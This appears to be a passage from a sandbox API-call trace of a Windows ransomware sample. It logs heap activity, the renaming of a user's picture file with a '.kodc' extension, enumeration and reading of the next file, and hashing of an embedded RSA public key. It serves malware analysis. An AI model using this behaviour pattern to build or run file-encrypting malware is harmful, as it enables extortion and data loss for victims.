out: hHeap=0x630000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x6868a0 [0099.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0099.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aef8 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aee0 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9bb60 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.507] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0xbd9d, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xbd9d, lpOverlapped=0x0) returned 1 [0099.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.511] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbda2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.511] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.511] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.512] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.512] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.512] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.512] CloseHandle (hObject=0x5cc) returned 1 [0099.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.513] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.513] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E_8Yzp r8pR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e_8yzp r8pr.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E_8Yzp r8pR.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e_8yzp r8pr.bmp.kodc")) returned 1 [0099.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.514] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.515] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf2a6a0, ftCreationTime.dwHighDateTime=0x1d5b8df, ftLastAccessTime.dwLowDateTime=0x1e5814d0, ftLastAccessTime.dwHighDateTime=0x1d5be14, ftLastWriteTime.dwLowDateTime=0x1e5814d0, ftLastWriteTime.dwHighDateTime=0x1d5be14, nFileSizeHigh=0x0, nFileSizeLow=0xc14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUPXPZWHl.gif", cAlternateFileName="FUPXPZ~1.GIF")) returned 1 [0099.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.515] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.515] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fUPXPZWHl.gif") returned=".gif" [0099.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fUPXPZWHl.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fupxpzwhl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.515] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=3092) returned 1 [0099.516] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.518] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.518] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.519] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.519] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.519] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xc14, lpOverlapped=0x0) returned 1 [0099.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.520] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.520] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.521] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.521] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.521] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.521] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.521] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.521] GetLastError () returned 0x0 [0099.521] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.521] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.521] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.521] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.522] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.522] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc10) returned 0x9b91b28 [0099.522] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.522] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x9b92740 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bb60 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aee0 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bba8 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aef8 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.522] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.523] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331af10 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331af28 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.524] GetCurrentThreadId () returned 0x42c [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5618 [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.524] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.524] GetCurrentThreadId () returned 0x42c [0099.524] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.525] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.526] 